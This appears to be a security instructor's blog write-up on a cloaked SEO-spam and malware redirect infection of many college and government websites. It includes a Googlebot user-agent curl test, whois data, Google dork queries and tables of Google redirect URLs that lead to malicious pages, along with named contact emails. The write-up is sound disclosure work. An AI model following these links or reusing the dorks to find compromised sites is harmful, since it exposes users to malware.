I have not identified the attackers, but they used a domain (SECUREDATA24.COM) registered in Hong Kong and a relay server in Amsterdam, so they seem pretty well-hidden. That domain is not currently on blacklists, but it should certainly be added to them immediately.
This infection is also quite subtle, and would not be easily detected by students or staff of the college. As far as I can tell, the malware is not delivered to people who use the website normally.
However, since the attacker was able to insert malware into several pages at KWC, and to insert a 302 redirect into the Apache configuration, they have a large incident response obligation now.
I highly recommend that KWC hire a security consultant to analyze their systems, to determine how the attack was done, and how much damage was done. They may be subject to legal notification requirements if personal data or health-related information was exposed.
More notifications:
http://blogs.chatham.edu/wp-content.bak/plugins/social/OTAwOQ-3D-3D.asp%C3%A2%E2%82%AC%C5%BD
After useless notification to the website admin, I emailed the President and "Assistant Vice President for Planning" as detailed here:
http://www.chatham.edu/about/presidents_staff.cfm
Warning: The pages I am examining here contain malware, so if you try this yourself, be careful!
inurl:edu viagra-online-100mg
As you can see, there are 1.8 million hits:
Clicking one of the hits in Google redirects to this page:
However, copying and pasting the URL leads to a clean page:
The Google cache shows the defacement:
I changed my User Agent to the Googlebot and saw the same thing.
This is clever, and I imagine it's a good way to persist on a server for a long time. Real links used by students and staff go to clean pages, but people coming in from Google get redirected to malicious sites.
curl http://www.kwc.edu > kwc-normal.htm
Here's how that site's source code looks.
Notice the small setCookie and getCookie functions:
Then I fetched the infected page:
curl -A "Googlebot/2.1 (+http://www.google.com/bot.html)" http://www.kwc.edu > kwc-google.htm
The dirty one shows the infection in its
source code:
I noticed these items:
<!-- d90fd6da5bb59c807b28b07724dc0506 -->
This appears to be a hash that identifies the website.
Googling it shows this interesting hit:
I don't know what mawords is; but I decided not to investigate it further right now.
<style>
.8tolyqpt {
position:absolute; left:4000px;
}
</style>
This conceals the injected code by placing it
4000 pixels to the right, which I tested using
this page:
http://www.w3schools.com/cssref/tryit.asp?filename=trycss_position_relative
However, the way this code is inserted, inside a for loop in a function in the head, I don't think it will ever be rendered.
I think its purpose is to feed the Googlebot keywords about Viagra, so people shopping for Viagra will find this page.
And my Avast antivirus was blocking the page now.
So I moved to a Kali Linux virtual machine, turned off Avast, and ran Wireshark while loading the page from the Google hits to get the whole story.
It's very simple. The Google link fetches the KWC page, but the infected server returns a 302 redirect to a securedata24.com link:
I googled that domain, and it is apparently not known as a malware host:
So I turned my antivirus back on and tried to go there, but it seems to have no Website.
Here are some more links showing information about it. It's an 8-month-old domain in Amsterdam that does not seem to have been used to host any real website.
http://domainagecheck.com/domain/securedata24.com
Securedata24.com may not be a known malware host, but it's sure serving up malware now.
Whois shows that it's registered from Hong Kong. Here's the Whois output with everything boring removed.
Notice the email addresses--this looks like an automatically generated domain, to be used temporarily by malware.
$ whois securedata24.com
Domain Name: SECUREDATA24.COM
Registrar: ONLINENIC, INC.
Whois Server: whois.onlinenic.com
Referral URL: http://www.OnlineNIC.com
Name Server: NS1.DNS-DIY.NET
Name Server: NS2.DNS-DIY.NET
Status: clientTransferProhibited
Updated Date: 01-apr-2013
Creation Date: 01-apr-2013
Expiration Date: 01-apr-2014
Domain Name:securedata24.com
Record created:4/1/2013
Record expired:04/01/2014
Domain servers in listed order:
ns1.dns-diy.net ns2.dns-diy.net
Administrat:
name-- Domain ID Shield Service
org-- Domain ID Shield Service CO., Limited
country-- CN
province-- Hong Kong
city-- Hong Kong
address-- Room 510-511A2 Nan Fung Tower., 173 Des Voeux Road C., Hong Kong
postalcode-- 999077
telephone-- +852.21581835
fax-- +852.30197491
E-mail-- se4944887232201@domainidshield.com
Technical Contact:
E-mail-- se4944887232202@domainidshield.com
Billing Contact:
E-mail-- se4944887101103@domainidshield.com
Registrant Contact:
E-mail-- se4944887101104@domainidshield.com
Their infected servers are being used now to serve malware and sell illegal drugs, and everyone can easily see it on Google searches.
I know from previous experience that some people in the security community will say I am not practicing "responsible disclosure" by publishing this immediately, but I don't agree.
The reasons to delay publication of a security finding are:
If KWC fixes it immediately, that's good. But what is the security benefit to anyone in concealing it?
If people think I am wrong, feel free to Tweet me @sambowne
I also could not find any information on how to report security incidents or how to contact the webmaster.
This situation makes them a logical target for the criminals who are using their systems, and it gives me very little hope that contacting them will do much good.
Nevertheless, I sent this email today, to admissions@kwc.edu, abuse@kwc.edu, and security@kwc.edu.
I also sent it to their Twitter account, which seems active, @kywesleyan.
Hello:I am Sam Bowne, an Instructor in Computer Networking and Information Technology at City College San Francisco.
Your web server has been hacked, and is being used to sell illegal drugs and to deliver malware.
To see the infection, simply google "inurl:kwc.edu viagra-online-100mg" (without the quotation marks) and click any link. I recommend using a Mac or Linux machine to perform this test because the pages that open contain malware.
I strongly recommend that you alert your webmaster, and engage the services of a web security consultant. There is quite a lot of work to be done to repair the damage, fix the vulnerabilities that caused this, and determine if your students or staff have been harmed.
Details are here: http://samsclass.info/125/proj11/subtle-infect.htm
Feel free to contact me if I can be of assistance.
After several tests, I found a URL that makes analysis easy from any device. This is the URL Google creates when a search is performed in Chrome on a MacBook Air, with all HTTPS protocols replaced by HTTP, to make sniffing easier.
I'm not linking to it, but if you copy and paste this, it works both the Macbook Air and the iPad:
http://www.google.com/url?sa=t&rct=j&q=inurl%3Abyu.edu%20viagra-online-100mg&source=web&cd=1&ved=0CCsQFjAA&url=http%3A%2F%2Fstore.moa.byu.edu%2Flet-the-children-come-unto-me-4.html%3Fc3rvc%3D484823&ei=3G-KUpaBOqH9iwKns4DABA&usg=AFQjCNHOcrDAehTNn04aaawyLtR74fH0-g&sig2=ILvHfQ3hM5ac5mEzxgXOwA&bvm=bv.56643336,d.cGE
Visiting that link shows this page, a warning from Google:
Here's the TCP conversation from Wireshark.
Clicking the link goes to a malicious site. Here's the important TCP conversation, asking for a page about art on the BYU.EDU server, but returning a 302 redirect to the malicious server securedata24.com:
For future reference, here are handy URLs to use to see the infections at other colleges:
TSU:
http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CC4QFjAA&url=http%3A%2F%2Fcost.tsu.edu%2FWebPages%2FNews.php%3FIndex%3D79%26y29zd%3D516464&ei=LoeKUpLWGcipiAKFqYH4Cw&usg=AFQjCNFpEj2OtWBmIffLAlpUmlcz_6VvtA&sig2=jFkx4c8JV4ipWCsboh6P2g&bvm=bv.56643336,d.cGE
UTS:
http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CCwQFjAA&url=http%3A%2F%2Fjournals.uts.edu%2Fvolume-x-2009%2F345-heavenly-mother.html%3Fam91c%3D580274&ei=dIeKUuLRA6WUiAL_ioHgCA&usg=AFQjCNFRtTIgxgHX1tzigDQW8KF0K3AAzQ&sig2=uh9NB_CAM6FKzlkNfSmKfQ&bvm=bv.56643336,d.cGE
Here's a link to the simpler infection at Chatham:
http://blogs.chatham.edu/wp-content.bak/plugins/social/OTAwOQ-3D-3D.asp%C3%A2%E2%82%AC%C5%BD
Using them, I verified that all four sites are still infected on 11-18-13.
BYU, TSU, and UTS are still infected at 3:13 pm on 11-19-13.
Repair Timeline
11/20/13 6:00 am All 19 infected 11/20/13 2:10 pm 7 cleaned, 12 still infected 11/21/13 3:50 pm 5 cleaned, 14 still infected (3 cleaned changed to infected, one infected changed to cleaned) 12/2/13 6:00 am 6 cleaned, 13 still infected 12/4/13 6:12 am 5 cleaned, 14 still infected
KWC: 6 of the first ten hits for "site:kwc.edu buy viagra" are still infected. The original reported link was fixed but came back.12-4-13 6:12 am testing; all unchanged except 16 is now re-infectedDAVIDSON: 9 of the first ten hits for "site:DAVIDSON.EDU online canadian pharmacy" are infected. The original reported link was fixed but came back.
UCSC: All of the first ten hits for "site:ucsc.edu viagra" are infected. The reported link was fixed, but came back the next day. Santa Cruz is nearby--I'd love to visit and see this thing from the inside. I want to find the best way to clean it, and get malware samples so we an recognize it and get it added to antivirus databases, if appropriate.
NCSU: 9 of the first ten hits for "site:ncsu.edu drug prices" are infected. The reported link was fixed, but came back the next day.
I used this Google search:
inurl:edu intitle:viagra
Here are the colleges that were infected, as of 9 am 11-20-13, with URLs that go to malicious pages (don't load them on an unprotected system).
Some of these are duplicates of infections I found previously, but I decided to include them all and try again to notify them, since clearly nothing has yet been fixed.
College | Emails | Malicious URL |
---|---|---|
1. UA.EDU Alabama @UofAlabama |
community.affairs@ua.edu dlamb@fa.ua.edu mbownes@uasystem.ua.edu pdunn@uasystem.ua.edu Fixed at 2:10 PM 11-20-13! Fixed when tested on 11-21-13 & 12-2-13 |
dateline.ua.edu/viagra-online-san-marino |
2. KWC.EDU Kentucky |
debbiebe@kwc.edu kpayne@kwc.edu admissions@kwc.edu krutherman@kwc.edu jkuhlman@kwc.edu
Fixed when tested on 11-21-13 |
http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=14&ved=0CFEQFjADOAo&url=http%3A%2F%2Fwww.kwc.edu%2Fpage.php%3Fpage%3D1135%26a3djl%3D983496&ei=FuyMUs_TB9HyigLA-YCIBg&usg=AFQjCNEiL4qQXQCr2r1e3A_WyyBLyQd_oA&sig2=NZKJE8w7An68ASRJ1c5oOw&bvm=bv.56643336,d.cGE |
3. WWW.COLBYCC.EDU Kansas |
george.mcnulty@colbycc.edu pat.erickson@colbycc.edu gregory.nichols@colbycc.edu debbie.schwanke@colbycc.edu
Still infected on 11-21-13 & 12-2-13 |
http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&ved=0CFoQFjAEOAo&url=http%3A%2F%2Fwww.colbycc.edu%2F%3Fy29sy%3D393622&ei=FuyMUs_TB9HyigLA-YCIBg&usg=AFQjCNEMa4eororLMbHVZWEEDXbEuRtL6w&sig2=KAmjrkyaLDsx4kbYnVhnxA&bvm=bv.56643336,d.cGE |
4. PARSONS.EDU New York |
BrinkmaG@newschool.edu ByfieldT@newschool.edu chacina@newschool.edu thinkparsons@newschool.edu thinkparsonsgrad@newschool.edu Still infected on 11-21-13 & 12-2-13 & 7-19-14 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=18&ved=0CHMQFjAHOAo&url=http%3A%2F%2Fpetlab.parsons.edu%2Famd%2Ftop-selling-herbal-viagra%2F&ei=FuyMUs_TB9HyigLA-YCIBg&usg=AFQjCNEy90ifx_7mMfJ8-33q1BtvsgMIlw&sig2=GsyEvUhGOgLBmOjkRet1Rg&bvm=bv.56643336,d.cGE |
5. BERKELEY.EDU California @UCBerkeley |
andypino@berkeley.edu rsanders@berkeley.edu CHANCELLOR@BERKELEY.EDU AUDIT@BERKELEY.EDU Fixed at 2:10 PM 11-20-13! Fixed when tested on 11-21-13 & 12-2-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=30&ved=0CHEQFjAJOBQ&url=http%3A%2F%2Fchl.berkeley.edu%2F2010%2F7%2Fpost2614%2Fgenerika-viagra-cialis&ei=h-6MUs2HMeWJiALw54GYBA&usg=AFQjCNHcFI6QMWqu9HavksN9ZJxDX2XxSw&sig2=AY8Em7IGIrVOcovf31xXgA&bvm=bv.56643336,d.cGE |
6. DAVIDSON.EDU North Carolina |
president@davidson.edu raramanujan@davidson.edu tichartier@davidson.edu edkania@davidson.edu Fixed at 2:10 PM 11-20-13!
Infected again on 11-21-13; still infected 12-2-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=35&ved=0CEwQFjAEOB4&url=http%3A%2F%2Fdavidsonjournal.davidson.edu%2Findex.php%2Forder-discount-viagra-online%2F&ei=6-6MUvvoM6O1iwLC6IEI&usg=AFQjCNFDRXMeEhVChigdkrC195RjUjoqDA&sig2=pXpBFiT855lPJlspneGhag&bvm=bv.56643336,d.cGE |
7. WCU.EDU North Carolina |
webmaster@wcu.edu wkbrenton@wcu.edu lgaetano@email.wcu.edu cfowler@email.wcu.edu Still infected on 11-21-13 & 12-2-13 & 7-19-14 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=39&ved=0CGwQFjAIOB4&url=http%3A%2F%2Fsandbox.wcu.edu%2Fthisweek%2Fincludes%2Finc.php%3Fp%3Dcialis-viagra-combination&ei=6-6MUvvoM6O1iwLC6IEI&usg=AFQjCNEW9BZ2mWPOB43LBWF4OuL21Jsn2Q&sig2=MXCEs5aOsizDlC4mgDcXtQ&bvm=bv.56643336,d.cGE |
8. UTS.EDU New York |
None
Still infected on 11-21-13 & 12-2-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=40&ved=0CHMQFjAJOB4&url=http%3A%2F%2Fwww.journals.uts.edu%2Fvolume-vi-2004-2005%2F%3Fam91c%3D262389&ei=6-6MUvvoM6O1iwLC6IEI&usg=AFQjCNGcE9zwkt03RPPgYdeHQGowq9Fwwg&sig2=0Y4BGf3Oo6bE59dziYdZKQ&bvm=bv.56643336,d.cGE |
9. TSU.EDU Texas |
rudleyjm@TSU.EDU Griffin_ka@TSU.EDU yu_lx@tsu.edu yu_lx@tsu.edu Still infected on 11-21-13 & 12-2-13 & 7-19-14 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=41&ved=0CCsQFjAAOCg&url=http%3A%2F%2Ftransportation.tsu.edu%2FTrans_Server%2FCTTR4TransportationServ%2Fwww.tsu.edu%2Fcore%2Fmanager%2Fpagemgrcontrolled%2Fpagepreviewa1b5.html%3Fdhjhb%3D659796&ei=2O-MUsWEEKHviQLf9ICwBA&usg=AFQjCNEzQ1LWShwoZdS9bWWrBCI2rqY_mA&sig2=UAXm8ivGAqOeLck7qOub6w&bvm=bv.56643336,d.cGE |
10. WWCC.EDU Washington |
steven.vanausdle@wwcc.edu i.ramsey@wwcc.edu wendy.samitore@wwcc.edu webmaster@wwcc.edu general@wwcc.edu
Still infected on 11-21-13 & 12-2-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=42&ved=0CDMQFjABOCg&url=http%3A%2F%2Fwww.wwcc.edu%2FCMS%2F%3Fid%3D835%26d3djy%3D424667&ei=2O-MUsWEEKHviQLf9ICwBA&usg=AFQjCNH3lPzl2i_UxOxJ-KX8GLlFD3ehOg&sig2=eLp2d_CKlugzm2AKKNkf5Q&bvm=bv.56643336,d.cGE |
11. NMSU.EDU New Mexico |
ckottong@nmsu.edu audit@nmsu.edu ovprweb@nmsu.edu hamid@nmsu.edu abuse@nmsu.edu Still infected on 11-21-13 & 12-2-13 & 7-19-14 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=43&ved=0CD8QFjACOCg&url=http%3A%2F%2Fchss.nmsu.edu%2Fprospective-students%2Fvisit-our-college%2F%3Fy2hzc%3D725794&ei=2O-MUsWEEKHviQLf9ICwBA&usg=AFQjCNFx77pUP7lp83FUoOcRg7vO9gaivA&sig2=kyQaW-1TG4jdFlvHqmVkDA&bvm=bv.56643336,d.cGE |
12. WBU.EDU Texas @WaylandBaptist |
webmaster@wbu.edu armesp@wbu.edu lezlieh@wbu.edu vhart@wbu.edu
Still infected on 11-21-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=44&ved=0CEcQFjADOCg&url=http%3A%2F%2Fwww.wbu.edu%2Flog%2F&ei=2O-MUsWEEKHviQLf9ICwBA&usg=AFQjCNGa6pq_p4K5RnHVlADKZZ7_MmlB4Q&sig2=duTiMSV_HHvyn4jOZQmzGw&bvm=bv.56643336,d.cGE |
13. UCSC.EDU California |
help@ucsc.edu chancellor@ucsc.edu mdoyle1@ucsc.edu yiz@soe.ucsc.edu Fixed at 2:10 PM 11-20-13!
Infected again on 11-21-13 & 12-2-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=45&ved=0CE4QFjAEOCg&url=http%3A%2F%2Fpromweek.soe.ucsc.edu%2F%3Fp%3D1594&ei=2O-MUsWEEKHviQLf9ICwBA&usg=AFQjCNE10sG-np9zjvxKNCwSuoYSum43RQ&sig2=CJ2ShwPqc65tupSuhtP9hQ&bvm=bv.56643336,d.cGE |
14. VT.EDU Virginia Tech @vtnews |
president@vt.edu rittenfa@vt.edu gscales@vt.edu lhaugh@vt.edu Fixed at 2:10 PM 11-20-13! Fixed when tested on 11-21-13 & 12-2-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=49&ved=0CGwQFjAIOCg&url=http%3A%2F%2Fdendro.cnre.vt.edu%2Fdoctor%2Fgeneric-viagra-india%2F&ei=2O-MUsWEEKHviQLf9ICwBA&usg=AFQjCNG7gtb95z5zjjqG4gpnKRW3M_2pDw&sig2=kEw8sKJTDhFvTQsJ0UNy-Q&bvm=bv.56643336,d.cGE |
15. UARK.EDU Arkansas @UArkansas |
chancell@uark.edu rhudson@uark.edu dandrews@uark.edu sleeds@uark.edu Fixed at 2:10 PM 11-20-13! Fixed when tested on 11-21-13 & 12-2-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=50&ved=0CHMQFjAJOCg&url=http%3A%2F%2Frgis.cast.uark.edu%2Findex.php%3Fq%3Dviagra-ghana&ei=2O-MUsWEEKHviQLf9ICwBA&usg=AFQjCNEOAX85AJw40JaupfamewRUHoR4LA&sig2=iQHQE1WuAXjzQ-RBe2RgUA&bvm=bv.56643336,d.cGE |
16. SFASU.EDU Texas |
jstandley@sfasu.edu liasrr@sfasu.edu taylorj1@sfasu.edu jljohnstone@sfasu.edu controller@sfasu.edu
Still infected on 11-21-13 |
cte.sfasu.edu/course/?pitemx=473 |
17. ISI.EDU California |
pnataraj@isi.edu jtw@isi.edu carl@isi.edu vcomms@usc.edu Still infected on 11-21-13 & 12-2-13 & 7-19-14 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=66&ved=0CFYQFjAFODw&url=http%3A%2F%2Fwww.lsi.edu%2Fblog%2Fwp-content%2Fuploads%2F2008%2F10%2F%3Fvan%3Dads-for-viagra%26go%3D1&ei=TPGMUvSkMOTEigL24AE&usg=AFQjCNHvVBr3jM59GoRyzIhoUOcDEr4oNw&sig2=6jR-t1WaK5VKg9lmrCy9lQ&bvm=bv.56643336,d.cGE |
18. NCSU.EDU North Carolina |
web_feedback@ncsu.edu newstips@ncsu.edu eileen_goldgeier@ncsu.edu academic-student-affairs@ncsu.edu Fixed at 2:10 PM 11-20-13!
Infected again on 11-21-13 & 12-2-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=88&ved=0CGAQFjAHOFA&url=http%3A%2F%2Femporium1.lib.ncsu.edu%2Fwolfram%2Fsounds%2F_css2.php%3Fp%3Dbuy-viagra-cialis-online&ei=jPGMUsgnqseKAuzQgIgM&usg=AFQjCNHsel9r1jcvxLie5H9cwISnUcbnFg&sig2=bgjyKXmv9HMPAq8jSaD2pg&bvm=bv.56643336,d.cGE |
19. PARKLAND.EDU Illinois |
ABlackman@parkland.edu MMobasseri@parkland.edu admissions@parkland.edu businessoffice@parkland.edu plehn@parkland.edu Still infected on 11-21-13 & 12-2-13 & 7-19-14 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=92&ved=0CDEQFjABOFo&url=http%3A%2F%2Fvirtual.parkland.edu%2Flanguages%2Findex.php%3Fidpost%3D3762%26join%3Dvendo-viagra-alicante&ei=HvKMUpnkFMn8iwLH7ID4Cw&usg=AFQjCNHGjmguu4NdSLeJLdcQoIVzVQk-XA&sig2=luLY594arg4CrcL2sKNbTQ&bvm=bv.56643336,d.cGE |
Today, 11-20-13, I sent notices as listed above, like this:
Subject: You have been hackedHello:
I am Sam Bowne, an Instructor in Computer Networking and Information Technology at City College San Francisco.
Your web server has been hacked, and is being used to sell illegal drugs and to deliver malware.
To see the infection, open the link below. I recommend using a Mac or Linux machine to perform this test because the pages that open contain malware.
I strongly recommend that you alert your webmaster, and engage the services of a web security consultant. There is quite a lot of work to be done to repair the damage, fix the vulnerabilities that caused this, and determine if your students or staff have been harmed.
Details are here: http://samsclass.info/125/proj11/subtle-infect.htm
Feel free to contact me if I can be of assistance.
inurl:gov intitle:viagra
inurl:bank intitle:viagra
inurl:school intitle:viagra
intitle:news intitle:viagra intitle:sale
"viagra" intitle:Canadian "state college"
"viagra" intitle:Canadian "state university"
"viagra" intitle:Canadian intitle:"school of"
"viagra" intitle:Canadian intitle:"representative"
intitle:viagra intitle:Canadian council
inurl:school viagra canadian
intitle:viagra intitle:canadian Website designed and maintained by Fifth Ape Design
Since I got helpful responses from two of the
colleges I notified yesterday, I changed my
notification policy. I only notified the
big-name schools on this list, hoping
to get more good security researchers
to join in so we can work together and
figure this thing out. Hopefully we can
post information that will be helpful to the
smaller schools and organizations that
have been hacked.
So I notified these schools this morning:
4. MIT.EDU
13. UCSC.EDU (the worst infection I have seen, apparently 2000 infected pages)
10. Youngstown State University
14. lyndonstate.edu
23. RUTGERS.EDU
Organization | Emails | Malicious URL |
---|---|---|
1. jamescitycountyva.gov Virginia |
webmaster@jamescitycountyva.gov security@jamescitycountyva.gov abuse@jamescitycountyva.gov Notified on 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=32&ved=0CDQQFjABOB4&url=http%3A%2F%2Fwww.jamescitycountyva.gov%2Fonline-viagra%2F&ei=fDaNUs-oNbCQigLY5YGQCg&usg=AFQjCNGum7BrEgfm-MTUdqtWAOpKUwNK3Q&sig2=r2RrerQ90TJAEhAYnWgkkw&bvm=bv.56988011,d.cGE |
2. winchester-in.gov |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=41&ved=0CDYQFjAAOCg&url=http%3A%2F%2Fbuy-viagra.winchester-in.gov%2F937.html&ei=vzeNUpObMYPDigKxvYDADQ&usg=AFQjCNGTNFay1K9j6b7W9uI3HqhZ_pSQIQ&sig2=abdmXrXk_PDK9oSUEwxL9Q&bvm=bv.56988011,d.cGE | |
3. chambersburgpa.gov |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=60&ved=0CHsQFjAJODI&url=http%3A%2F%2Fwww.chambersburgpa.gov%2Foldwebsite%2F&ei=rTiNUqyRL-H8igKS2IC4Cw&usg=AFQjCNG95dpcGUdKYZzkuewl_rhlP0bKfQ&sig2=59F-5abksiA6MquCxtl8IA&bvm=bv.56988011,d.cGE | |
4. MIT.EDU Massachusetts |
http://ist.mit.edu/security/report Reported 11-21-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=18&ved=0CFsQFjAHOAo&url=http%3A%2F%2Fgroups.csail.mit.edu%2FEVO-DesignOpt%2Flebaronyearbook%2Fuploads%2Fstyle.php%3Fcap%3Dfirst-viagra-bank%26cc%3D1&ei=JDqNUrbGNeKaiQLhsYC4DQ&usg=AFQjCNHbFel8qG3ng2-65UjEaj3Sv8Q-WQ&sig2=z49trmHODzk0vNW1ED9UOA
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=65&ved=0CEkQFjAEODw&url=http%3A%2F%2Fgroups.csail.mit.edu%2FEVO-DesignOpt%2Flebaronyearbook%2Fuploads%2Fstyle.php%3Fcap%3Dviagra-school%26cc%3D1&ei=nD2NUob2O-TAigLoyIHAAg&usg=AFQjCNGtatR97iw6yL7pc3OF4Hq_vlRUgQ&sig2=sq2EJRyrM4Lc_nVIAmNxfg
Not notified yet: |
5. keystonescienceschool.org Colorado |
EReid@KeystoneScienceSchool.org MNuttelman@KeystoneScienceSchool.org DMiller@KeystoneScienceSchool.org ASeidler@KeystoneScienceSchool.org Notified on 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0CE0QFjAE&url=http%3A%2F%2Fkeystonescienceschool.org%2Fslides%2F%3Fm%3D948&ei=4jqNUpbVEqL0iQKizIGgAg&usg=AFQjCNGRTvFfSNMffBSjPLpzzgG68nVx7A&sig2=KRRxaLdF8fKMiR3SzJ0gnQ |
6. al-imanschool.org |
None | https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=13&ved=0CEQQFjACOAo&url=http%3A%2F%2Fal-imanschool.org%2Fold%2Fhomework%2Fviagra-online-in-uk.html&ei=LzyNUtn3BeakiQKpy4HQBg&usg=AFQjCNEbYVboigtAtH_wKTKnPGUBLQ8YgA&sig2=rJRdjP-HKkhviEoTVdF0Ag |
7. thehomeschoolvillage.com |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=28&ved=0CGIQFjAHOBQ&url=http%3A%2F%2Fwww.thehomeschoolvillage.com%2F2011%2F02%2Fhigh-school-locker-2.html&ei=xTyNUpLxOcyaigLB7oHgCQ&usg=AFQjCNFjqUPD0DuwSW6G9X-GKEa6t7uJew&sig2=Skh-eaQ0zLtnGFwSLxlNbQ | |
8. borah.highschoolmedia.org |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=61&ved=0CCsQFjAAODw&url=http%3A%2F%2Fborah.highschoolmedia.org%2Fviagra%2F&ei=nD2NUob2O-TAigLoyIHAAg&usg=AFQjCNHhKdwut5QNy56CRqhgkzXsyJAltg&sig2=WI8SoscuejnJVLGdyre-Yg | |
9. butlercountyrecycles.org Ohio |
None | https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CC4QFjAA&url=http%3A%2F%2Fwww.butlercountyrecycles.org%2F%3Fi%3Dlevitracialisviagra&ei=20CNUsmNOqT2iwKlmYCYDw&usg=AFQjCNENtEFWFf1ovZ5MlrNX_vyO5LaRKw&sig2=wAM-hpKyOIo-osTkKRpylw |
13. UCSC.EDU California |
help@ucsc.edu chancellor@ucsc.edu mdoyle1@ucsc.edu yiz@soe.ucsc.edu This page is still infected; notified again 11-21-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0CEkQFjAE&url=http%3A%2F%2Faia-society.ucsc.edu%2F.TemporaryItems%2F%3Fkukogiwa%3DNzA0OA-3D-3D%26tawyxiwa%3Dnews_viagra&ei=ykWNUpq1OoKmigL9w4DwDw&usg=AFQjCNEhu_03DihtVJicOGIIQSA35kPRTQ&sig2=URxafiN5OgOPONZpSBf-Bg
And many, many more infected pages, see https://www.google.com/#q=site:ucsc.edu+viagra |
10. www.ysunews.com Youngstown State University Ohio |
chair@csis.ysu.edu ElecCompEng@ysu.edu police@ysu.edu techdesk@ysu.edu Notified 11-21-13 Still infected 11-30-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=19&ved=0CHAQFjAIOAo&url=http%3A%2F%2Fwww.ysunews.com%2Fcanadian-viagra-prices%2F&ei=lUiNUsXXOYPDigKxvYDADQ&usg=AFQjCNEuPPaPmdqOJRXGVU4_-8smJTZ7ZA&sig2=Zp0yuDz9YDls2dlTQ2RvGA&bvm=bv.56988011,d.cGE |
11. theconservationfoundation.org Illinoisa |
info@theconservationfoundation.org
Notified on 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=27&ved=0CEcQFjAGOBQ&url=http%3A%2F%2Fwww.theconservationfoundation.org%2Fwhat-we-do%2Feducation.html&ei=3UqNUpzeJYaZiAKg9IDwAg&usg=AFQjCNE1-XldlYZsyNqTmeW67WAsCKxpew&sig2=dtHBJ4ShGAi9A1YbMbt5EA&bvm=bv.56988011,d.cGE |
12. naftd.org North American Fire Training Directors Washington, DC |
naftd@fsi.illinois.edu Mike.Richwine@fire.ca.gov bstevens@dhses.ny.gov billy.shelton@vdfp.virginia.gov Notified on 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=46&ved=0CFUQFjAFOCg&url=http%3A%2F%2Fwww.naftd.org%2Fsildenafil-viagra%2F&ei=lEuNUte4BIOsjALeioG4CA&usg=AFQjCNHqhIFNE9uSuPkHzsQEw0-PdwbT-A&sig2=H6O9pB1jRcR52LZ65aKUnQ&bvm=bv.56988011,d.cGE |
13. ednf.org Virginia |
ednfstaff@ednf.org Notified on 11-25-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=53&ved=0CDwQFjACODI&url=http%3A%2F%2Fwww.ednf.org%2Findex.php%3Foption%3Dcom_content%26task%3Dview%26id%3D889%26Itemid%3D88888981&ei=jUyNUv2lEOS9iwL_o4CAAQ&usg=AFQjCNFc6I50Q7wbXpDZ1680o3koEfgAVQ&sig2=OWFFlkVIuRMJF7gHU6kkFw&bvm=bv.56988011,d.cGE |
14. lyndonstate.edu Vermont |
HelpDesk@lyndonstate.edu Registrars@lyndonstate.edu George.Hacking@lyndonstate.edu Keith.Chamberlin@Lyndonstate.edu Notified 11-21-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=41&ved=0CC0QFjAAOCg&url=http%3A%2F%2Fmeteorology.lyndonstate.edu%2Fforecast%2Ftime.php%3Fodi%3Donline-canadian-viagra-sales%26on%3D1&ei=Kk6NUubIIo3piwL83YDQDQ&usg=AFQjCNFCPJjKw3fN7-anvj_iKHw6ROTEoQ&sig2=DLswaN_RBMEbi42u7IMMcg&bvm=bv.56988011,d.cGE |
15. asu.edu Arizona |
abuse@asu.edu security@asu.edu Michael.Crow@asu.edu dcst@asu.edu Notified 11-21-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=19&ved=0CGQQFjAIOAo&url=http%3A%2F%2Farchaeology.la.asu.edu%2F_themes%2F_vti_cnf%2Flow.php%3Fp%3Dcanadian-pharmacy-free-viagra&ei=7U-NUrDiPOn5iQLGqYCoAQ&usg=AFQjCNED16sZxd4ahCjN3O2SLZoT0WSHVA&sig2=r5ioL9mE24-tMnimU8kEoQ&bvm=bv.56988011,d.cGE |
16. asea.org Alabama State Employees Association |
http://www.asea.org/?p=931 http://www.asea.org/?p=954 http://www.asea.org/?p=2074 http://www.asea.org/?p=842 http://www.asea.org/?p=321 http://www.asea.org/?p=440 | |
